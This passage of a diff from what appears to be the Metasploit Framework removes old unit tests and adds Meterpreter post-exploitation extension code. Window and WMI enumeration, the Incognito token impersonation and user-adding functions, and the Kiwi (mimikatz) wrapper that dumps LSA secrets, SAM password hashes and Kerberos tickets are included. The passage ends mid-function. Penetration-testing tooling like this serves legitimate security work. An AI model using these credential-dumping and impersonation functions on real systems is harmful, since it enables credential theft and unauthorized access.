  462. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -27
  463. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -280
  464. data/lib/rex/exploitation/seh.rb.ut.rb +0 -20
  465. data/lib/rex/file.rb.ut.rb +0 -17
  466. data/lib/rex/io/ring_buffer.rb.ut.rb +0 -135
  467. data/lib/rex/nop/opty2.rb.ut.rb +0 -24
  468. data/lib/rex/parser/arguments.rb.ut.rb +0 -68
  469. data/lib/rex/parser/ini.rb.ut.rb +0 -30
  470. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -18
  471. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -39
  472. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -37
  473. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb +0 -52
  474. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -43
  475. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -128
  476. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb +0 -64
  477. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb +0 -29
  478. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb +0 -155
  479. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb +0 -128
  480. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -124
  481. data/lib/rex/proto.rb.ts.rb +0 -9
  482. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -10
  483. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -492
  484. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -86
  485. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
  486. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
  487. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
  488. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
  489. data/lib/rex/proto/drda.rb.ts.rb +0 -18
  490. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
  491. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
  492. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
  493. data/lib/rex/proto/http.rb.ts.rb +0 -13
  494. data/lib/rex/proto/http/client.rb.ut.rb +0 -96
  495. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
  496. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  497. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
  498. data/lib/rex/proto/http/header.rb.ut.rb +0 -47
  499. data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
  500. data/lib/rex/proto/http/request.rb.ut.rb +0 -215
  501. data/lib/rex/proto/http/response.rb.ut.rb +0 -150
  502. data/lib/rex/proto/http/server.rb.ut.rb +0 -80
  503. data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
  504. data/lib/rex/proto/rfb.rb.ut.rb +0 -40
  505. data/lib/rex/proto/smb.rb.ts.rb +0 -9
  506. data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
  507. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
  508. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
  509. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
  510. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
  511. data/lib/rex/service_manager.rb.ut.rb +0 -33
  512. data/lib/rex/socket.rb.ut.rb +0 -108
  513. data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
  514. data/lib/rex/socket/parameters.rb.ut.rb +0 -52
  515. data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
  516. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
  517. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
  518. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
  519. data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
  520. data/lib/rex/socket/tcp.rb.ut.rb +0 -65
  521. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
  522. data/lib/rex/socket/udp.rb.ut.rb +0 -45
  523. data/lib/rex/test.rb +0 -36
  524. data/lib/rex/text.rb.ut.rb +0 -193
  525. data/lib/rex/transformer.rb.ut.rb +0 -39
  526. data/lib/rex/ui/text/color.rb.ut.rb +0 -19
  527. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
  528. data/lib/rex/ui/text/table.rb.ut.rb +0 -56
@@ -0,0 +1,77 @@
1
+ # -*- coding: binary -*-
2
+ module Rex
3
+ module Post
4
+ module Meterpreter
5
+ module Extensions
6
+ module Extapi
7
+
8
+ TLV_TYPE_EXTENSION_EXTAPI = 0
9
+
10
+ TLV_TYPE_EXT_WINDOW_ENUM_GROUP = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1)
11
+ TLV_TYPE_EXT_WINDOW_ENUM_PID = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 2)
12
+ TLV_TYPE_EXT_WINDOW_ENUM_HANDLE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 3)
13
+ TLV_TYPE_EXT_WINDOW_ENUM_TITLE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 4)
14
+ TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 5)
15
+
16
+ TLV_TYPE_EXT_SERVICE_ENUM_GROUP = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 10)
17
+ TLV_TYPE_EXT_SERVICE_ENUM_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 11)
18
+ TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 12)
19
+ TLV_TYPE_EXT_SERVICE_ENUM_PID = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 13)
20
+ TLV_TYPE_EXT_SERVICE_ENUM_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 14)
21
+ TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 15)
22
+
23
+ TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 20)
24
+ TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 21)
25
+ TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 22)
26
+ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 23)
27
+ TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
28
+ TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
29
+ TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
30
+ TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27)
31
+
32
+ TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28)
33
+ TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29)
34
+
35
+ TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
36
+
37
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 38)
38
+
39
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 39)
40
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40)
41
+
42
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
43
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
44
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
45
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
46
+
47
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
48
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
49
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 47)
50
+ TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA = TLV_META_TYPE_RAW | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 48)
51
+
52
+ TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 50)
53
+ TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 51)
54
+ TLV_TYPE_EXT_CLIPBOARD_MON_DUMP = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 52)
55
+ TLV_TYPE_EXT_CLIPBOARD_MON_PURGE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 53)
56
+
57
+ TLV_TYPE_EXT_ADSI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 55)
58
+ TLV_TYPE_EXT_ADSI_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 56)
59
+ TLV_TYPE_EXT_ADSI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 57)
60
+ TLV_TYPE_EXT_ADSI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 58)
61
+ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 59)
62
+ TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
63
+ TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
64
+
65
+ TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65)
66
+ TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66)
67
+ TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67)
68
+ TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68)
69
+ TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
70
+ TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
71
+ TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71)
72
+
73
+ end
74
+ end
75
+ end
76
+ end
77
+ end
@@ -0,0 +1,56 @@
1
+ # -*- coding: binary -*-
2
+
3
+ module Rex
4
+ module Post
5
+ module Meterpreter
6
+ module Extensions
7
+ module Extapi
8
+ module Window
9
+
10
+ ###
11
+ #
12
+ # This meterpreter extension contains extended API functions for
13
+ # querying and managing desktop windows.
14
+ #
15
+ ###
16
+ class Window
17
+
18
+ def initialize(client)
19
+ @client = client
20
+ end
21
+
22
+ # Enumerate all the windows on the target.
23
+ # If the specified parent window is nil, then all top-level windows
24
+ # are enumerated. Otherwise, all child windows of the specified
25
+ # parent window are enumerated.
26
+ def enumerate(include_unknown = false, parent_window = nil)
27
+ request = Packet.create_request('extapi_window_enum')
28
+
29
+ if include_unknown
30
+ request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
31
+ end
32
+
33
+ if not parent_window.nil?
34
+ request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
35
+ end
36
+
37
+ response = client.send_request(request)
38
+
39
+ windows = []
40
+
41
+ response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) { |w|
42
+ windows << {
43
+ :pid => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
44
+ :handle => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
45
+ :title => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE)
46
+ }
47
+ }
48
+
49
+ windows.sort_by { |w| w[:pid] }
50
+ end
51
+
52
+ attr_accessor :client
53
+
54
+ end
55
+
56
+ end; end; end; end; end; end
@@ -0,0 +1,75 @@
1
+ # -*- coding: binary -*-
2
+
3
+ module Rex
4
+ module Post
5
+ module Meterpreter
6
+ module Extensions
7
+ module Extapi
8
+ module Wmi
9
+
10
+ ###
11
+ #
12
+ # This meterpreter extension contains extended API functions for
13
+ # performing WMI queries.
14
+ #
15
+ ###
16
+ class Wmi
17
+
18
+ def initialize(client)
19
+ @client = client
20
+ end
21
+
22
+ #
23
+ # Perform a generic wmi query against the target machine.
24
+ #
25
+ # @param query [String] The WMI query string.
26
+ # @param root [String] Specify root to target, otherwise defaults
27
+ # to 'root\cimv2'
28
+ #
29
+ # @return [Hash] Array of field names with associated values.
30
+ #
31
+ def query(query, root = nil)
32
+ request = Packet.create_request('extapi_wmi_query')
33
+
34
+ request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank?
35
+ request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
36
+
37
+ response = client.send_request(request)
38
+
39
+ # Bomb out with the right error messa
40
+ error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR)
41
+ raise error_msg if error_msg
42
+
43
+ fields = []
44
+ fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS)
45
+
46
+ # If we didn't get any fields back, then we didn't get any results.
47
+ # The reason is because without results, we don't know which fields
48
+ # were requested in the first place
49
+ return nil unless fields_tlv
50
+
51
+ fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f|
52
+ fields << f.value
53
+ }
54
+
55
+ values = []
56
+ response.each(TLV_TYPE_EXT_WMI_VALUES) { |r|
57
+ value = []
58
+ r.each(TLV_TYPE_EXT_WMI_VALUE) { |v|
59
+ value << v.value
60
+ }
61
+ values << value
62
+ }
63
+
64
+ return {
65
+ :fields => fields,
66
+ :values => values
67
+ }
68
+ end
69
+
70
+ attr_accessor :client
71
+
72
+ end
73
+
74
+ end; end; end; end; end; end
75
+
@@ -1,4 +1,3 @@
1
- #!/usr/bin/env ruby
2
1
  # -*- coding: binary -*-
3
2
 
4
3
  require 'rex/post/meterpreter/extensions/incognito/tlv'
@@ -19,76 +18,76 @@ module Incognito
19
18
  class Incognito < Extension
20
19
 
21
20
 
22
- def initialize(client)
23
- super(client, 'incognito')
24
-
25
- client.register_extension_aliases(
26
- [
27
- {
28
- 'name' => 'incognito',
29
- 'ext' => self
30
- },
31
- ])
32
- end
33
-
34
-
35
- def incognito_list_tokens(token_order)
36
- request = Packet.create_request('incognito_list_tokens')
37
- request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
38
-
39
- response = client.send_request(request)
40
-
41
- return {
42
- 'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
43
- 'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
44
- }
45
- end
46
-
47
- def incognito_impersonate_token(username)
48
- request = Packet.create_request('incognito_impersonate_token')
49
- request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
50
- response = client.send_request(request)
51
-
52
- response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
53
- end
54
-
55
- def incognito_add_user(host, username, password)
56
- request = Packet.create_request('incognito_add_user')
57
- request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
58
- request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
59
- request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
60
- response = client.send_request(request)
61
-
62
- response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
63
- end
64
-
65
- def incognito_add_group_user(host, groupname, username)
66
- request = Packet.create_request('incognito_add_group_user')
67
- request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
68
- request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
69
- request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
70
- response = client.send_request(request)
71
-
72
- response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
73
- end
74
-
75
- def incognito_add_localgroup_user(host, groupname, username)
76
- request = Packet.create_request('incognito_add_localgroup_user')
77
- request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
78
- request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
79
- request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
80
- response = client.send_request(request)
81
-
82
- response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
83
- end
84
-
85
- def incognito_snarf_hashes(host)
86
- request = Packet.create_request('incognito_snarf_hashes')
87
- request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
88
- response = client.send_request(request)
89
-
90
- return true
91
- end
21
+ def initialize(client)
22
+ super(client, 'incognito')
23
+
24
+ client.register_extension_aliases(
25
+ [
26
+ {
27
+ 'name' => 'incognito',
28
+ 'ext' => self
29
+ },
30
+ ])
31
+ end
32
+
33
+
34
+ def incognito_list_tokens(token_order)
35
+ request = Packet.create_request('incognito_list_tokens')
36
+ request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
37
+
38
+ response = client.send_request(request)
39
+
40
+ return {
41
+ 'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
42
+ 'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
43
+ }
44
+ end
45
+
46
+ def incognito_impersonate_token(username)
47
+ request = Packet.create_request('incognito_impersonate_token')
48
+ request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
49
+ response = client.send_request(request)
50
+
51
+ response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
52
+ end
53
+
54
+ def incognito_add_user(host, username, password)
55
+ request = Packet.create_request('incognito_add_user')
56
+ request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
57
+ request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
58
+ request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
59
+ response = client.send_request(request)
60
+
61
+ response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
62
+ end
63
+
64
+ def incognito_add_group_user(host, groupname, username)
65
+ request = Packet.create_request('incognito_add_group_user')
66
+ request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
67
+ request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
68
+ request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
69
+ response = client.send_request(request)
70
+
71
+ response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
72
+ end
73
+
74
+ def incognito_add_localgroup_user(host, groupname, username)
75
+ request = Packet.create_request('incognito_add_localgroup_user')
76
+ request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
77
+ request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
78
+ request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
79
+ response = client.send_request(request)
80
+
81
+ response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
82
+ end
83
+
84
+ def incognito_snarf_hashes(host)
85
+ request = Packet.create_request('incognito_snarf_hashes')
86
+ request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
87
+ response = client.send_request(request)
88
+
89
+ return true
90
+ end
92
91
 
93
92
  end
94
93
 
@@ -0,0 +1,361 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'rex/post/meterpreter/extensions/kiwi/tlv'
4
+ require 'rexml/document'
5
+
6
+ module Rex
7
+ module Post
8
+ module Meterpreter
9
+ module Extensions
10
+ module Kiwi
11
+
12
+ ###
13
+ #
14
+ # Kiwi extension - grabs credentials from windows memory.
15
+ #
16
+ # Benjamin DELPY `gentilkiwi`
17
+ # http://blog.gentilkiwi.com/mimikatz
18
+ #
19
+ # extension converted by OJ Reeves (TheColonial)
20
+ ###
21
+
22
+ class Kiwi < Extension
23
+
24
+ #
25
+ # These are constants that identify the type of credential to dump
26
+ # from the target machine.
27
+ #
28
+ PWD_ID_SEK_ALLPASS = 0
29
+ PWD_ID_SEK_WDIGEST = 1
30
+ PWD_ID_SEK_MSV = 2
31
+ PWD_ID_SEK_KERBEROS = 3
32
+ PWD_ID_SEK_TSPKG = 4
33
+ PWD_ID_SEK_LIVESSP = 5
34
+ PWD_ID_SEK_SSP = 6
35
+ PWD_ID_SEK_DPAPI = 7
36
+
37
+ #
38
+ # List of names which represent the flags that are part of the
39
+ # dumped kerberos tickets. The order of these is important. Each
40
+ # of them was pulled from the Mimikatz 2.0 source base.
41
+ #
42
+ KERBEROS_FLAGS = [
43
+ "NAME CANONICALIZE",
44
+ "<unknown>",
45
+ "OK AS DELEGATE",
46
+ "<unknown>",
47
+ "HW AUTHENT",
48
+ "PRE AUTHENT",
49
+ "INITIAL",
50
+ "RENEWABLE",
51
+ "INVALID",
52
+ "POSTDATED",
53
+ "MAY POSTDATE",
54
+ "PROXY",
55
+ "PROXIABLE",
56
+ "FORWARDED",
57
+ "FORWARDABLE",
58
+ "RESERVED"
59
+ ].map(&:freeze).freeze
60
+
61
+ #
62
+ # Typical extension initialization routine.
63
+ #
64
+ # @param client (see Extension#initialize)
65
+ def initialize(client)
66
+ super(client, 'kiwi')
67
+
68
+ client.register_extension_aliases(
69
+ [
70
+ {
71
+ 'name' => 'kiwi',
72
+ 'ext' => self
73
+ },
74
+ ])
75
+ end
76
+
77
+ #
78
+ # Dump the LSA secrets from the target machine.
79
+ #
80
+ # @return [Hash<Symbol,Object>]
81
+ def lsa_dump
82
+ request = Packet.create_request('kiwi_lsa_dump_secrets')
83
+
84
+ response = client.send_request(request)
85
+
86
+ result = {
87
+ :major => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ),
88
+ :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN),
89
+ :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME),
90
+ :syskey => response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY),
91
+ :nt5key => response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY),
92
+ :nt6keys => [],
93
+ :secrets => [],
94
+ :samkeys => []
95
+ }
96
+
97
+ response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k|
98
+ result[:nt6keys] << {
99
+ :id => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID),
100
+ :value => k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)
101
+ }
102
+ end
103
+
104
+ response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s|
105
+ result[:secrets] << {
106
+ :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME),
107
+ :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV),
108
+ :ntlm => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM),
109
+ :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR),
110
+ :current_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW),
111
+ :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD),
112
+ :old_raw => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)
113
+ }
114
+ end
115
+
116
+ response.each(TLV_TYPE_KIWI_LSA_SAM) do |s|
117
+ result[:samkeys] << {
118
+ :rid => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID),
119
+ :user => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER),
120
+ :ntlm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH),
121
+ :lm_hash => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)
122
+ }
123
+ end
124
+
125
+ result
126
+ end
127
+
128
+ #
129
+ # Convert a flag set to a list of string representations for the bit flags
130
+ # that are set.
131
+ #
132
+ # @param flags [Fixnum] Integer bitmask of Kerberos token flags.
133
+ #
134
+ # @return [Array<String>] Names of all set flags in +flags+. See
135
+ # {KERBEROS_FLAGS}
136
+ def to_kerberos_flag_list(flags)
137
+ flags = flags >> 16
138
+ results = []
139
+
140
+ KERBEROS_FLAGS.each_with_index do |item, idx|
141
+ if (flags & (1 << idx)) != 0
142
+ results << item
143
+ end
144
+ end
145
+
146
+ results
147
+ end
148
+
149
+ #
150
+ # List available kerberos tickets.
151
+ #
152
+ # @param export [Bool] Set to +true+ to export the content of each ticket
153
+ #
154
+ # @return [Array<Hash>]
155
+ #
156
+ def kerberos_ticket_list(export)
157
+ export ||= false
158
+ request = Packet.create_request('kiwi_kerberos_ticket_list')
159
+ request.add_tlv(TLV_TYPE_KIWI_KERB_EXPORT, export)
160
+ response = client.send_request(request)
161
+
162
+ results = []
163
+
164
+ response.each(TLV_TYPE_KIWI_KERB_TKT) do |t|
165
+ results << {
166
+ :enc_type => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_ENCTYPE),
167
+ :start => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_START),
168
+ :end => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_END),
169
+ :max_renew => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_MAXRENEW),
170
+ :server => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERNAME),
171
+ :server_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERREALM),
172
